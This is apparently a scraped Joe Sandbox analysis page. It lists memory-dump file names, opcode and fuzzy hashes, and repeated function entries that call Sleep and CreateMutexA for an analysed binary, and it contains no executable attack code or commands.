Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2*
API String ID: 1464230837-2722087641
Opcode ID: 67adf38350e2b0fa57283f700a80f5fea463f182d56d1d2eaad4fbdabf093a02
Instruction ID: 329563ca3fd780bcf3494ecaaf36b89fce80de92761d7ff003d25726347a01a1
Opcode Fuzzy Hash: 67adf38350e2b0fa57283f700a80f5fea463f182d56d1d2eaad4fbdabf093a02
Instruction Fuzzy Hash: C831AB327641048FFB1CDBB8EC887ADB766EBC2310F208618E414DB6C1C77599A48712

Function 0024A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0024A963
CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981

Strings

T2*, xrefs: 0024A970

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2*
API String ID: 1464230837-2722087641
Opcode ID: 48d582c0b494e27c7726a8303c2a085542d60e2c1cf9ee1578ad69c51568cbe5
Instruction ID: ee301111c088559efac547b57cfad38d45f8732424eb602d493736bfada716b0
Opcode Fuzzy Hash: 48d582c0b494e27c7726a8303c2a085542d60e2c1cf9ee1578ad69c51568cbe5
Instruction Fuzzy Hash: BF3188317B41049BFB1CDBB8EDC9B6DB766DB86310F248218E418D73D1C77699A48B12

Function 0024A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0024A963
CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981

Strings

T2*, xrefs: 0024A970

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2*
API String ID: 1464230837-2722087641
Opcode ID: d864bc92b16244ed72821172e87d033c30015ccbc74f27ce2371136162983736
Instruction ID: bbdb990f06f038e77478be17d8c65f07eb514e25ba91c3ed61a2742f613087a0
Opcode Fuzzy Hash: d864bc92b16244ed72821172e87d033c30015ccbc74f27ce2371136162983736
Instruction Fuzzy Hash: BE3199317A41408FFB0CDFB8EC8976DB766EB86310F208218E408972D1C7B699A48712

Function 0024A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0024A963
CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981

Strings

T2*, xrefs: 0024A970

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2*
API String ID: 1464230837-2722087641
Opcode ID: faec70a8885251e5ad29f9eec22b91ab5c7aa02509807a0e159f4f70233134d9
Instruction ID: f65ca356f4fd651617a73674fd3732c2c28695f0c9f02f15ca75cf8e1516125d
Opcode Fuzzy Hash: faec70a8885251e5ad29f9eec22b91ab5c7aa02509807a0e159f4f70233134d9
Instruction Fuzzy Hash: 40319B317B41008BEB1CDFB8ED8DB6DB766EFC1314F248218E4149B2C5DBB599A48B52

Function 0024A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0024A963
CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981

Strings

T2*, xrefs: 0024A970

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2*
API String ID: 1464230837-2722087641
Opcode ID: 7afed826c71a2341642c3fa33aa2e3abea7f78cd5ddfec2ab11038144f52fced
Instruction ID: e73ce4c1fd2f1b1c20c38661dc05cac62ac3266295bb91beb59961de96f4d0ea
Opcode Fuzzy Hash: 7afed826c71a2341642c3fa33aa2e3abea7f78cd5ddfec2ab11038144f52fced
Instruction Fuzzy Hash: 81319B31AA41008BEB0CDBB8EDC976DB766EFC1314F248218E4149B2C1CB7599A48712

Function 0024A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0024A963
CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981

Strings

T2*, xrefs: 0024A970

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2*
API String ID: 1464230837-2722087641
Opcode ID: 056f5632eecad4a4cab295496df8b745bc281e01968efdb65d42ed5a19c3c3fa
Instruction ID: 0f99a0c4812c31c48315563d85c8f639934552c15000c05fdfdd88460be98e53
Opcode Fuzzy Hash: 056f5632eecad4a4cab295496df8b745bc281e01968efdb65d42ed5a19c3c3fa
Instruction Fuzzy Hash: 623177716A42048BFB1CDBB8ED89B6DF77AEB82310F248218E414D73D1C77599A48752

Function 00249ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0024A963
CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981

Strings

T2*, xrefs: 0024A970

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
